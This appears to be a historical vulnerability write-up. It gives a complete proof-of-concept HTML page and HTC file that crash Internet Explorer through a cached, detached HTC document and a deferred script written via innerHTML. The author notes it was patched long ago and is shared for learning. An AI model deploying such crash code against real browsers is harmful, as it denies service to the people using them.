Changing an HTC behavior’s URL to cache its document, then changing it back, and then writing an innerHTML with a deferred script to the cached HTC document crashes IE. The size of the HTC file matters — if it’s too short, the crash doesn’t happen.

index.html:

```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_htc_cachedDocument</title></head>
<body style="behavior:url(htcfile.htc)">
<font face="Tahoma" size="2">
<center>
<h2>DoS_htc_cachedDocument</h2>
<input type="button" onclick="crashMe()" value="Crash me in two seconds"><br /><br />
</center>
<hr />
PS: the size of the htc file itself is <u>very important</u>. If it's too short, it won't crash.

</font>

<script language="JavaScript">
var secondHTC;

function crashMe()
{
	// Step 1: change the behavior URL so the HTC is re-fetched and its document is cached (see htcfile.htc)
	document.body.style.behavior = 'url(htcfile.htc?getDocument)';
	// Step 2: one second later, switch the behavior back to the original URL
	setTimeout("document.body.style.behavior = 'url(htcfile.htc)';",1000);
	// Step 3: one second after that, write innerHTML with a deferred script into the cached HTC document
	setTimeout("secondHTC.body.innerHTML = '.<script defer>alert()<\/script>';",2000);
}
</script>
</body>
</html>
```

htcfile.htc:

```html
<script language="JavaScript">
// When loaded via the ?getDocument URL, hand this HTC's document object to the host page
if (document.URL.indexOf('getDocument') != -1)
{
	window.secondHTC = document;
}

/*
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
*/
</script>
```

The bulk comment text in the HTC file is load-bearing: removing it prevents the crash, which suggests the crash depends on the size of the HTC document's internal memory allocation. When innerHTML containing a deferred script is written into the cached (now "dead") HTC document, the attempt to access that script's execution context causes an access violation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.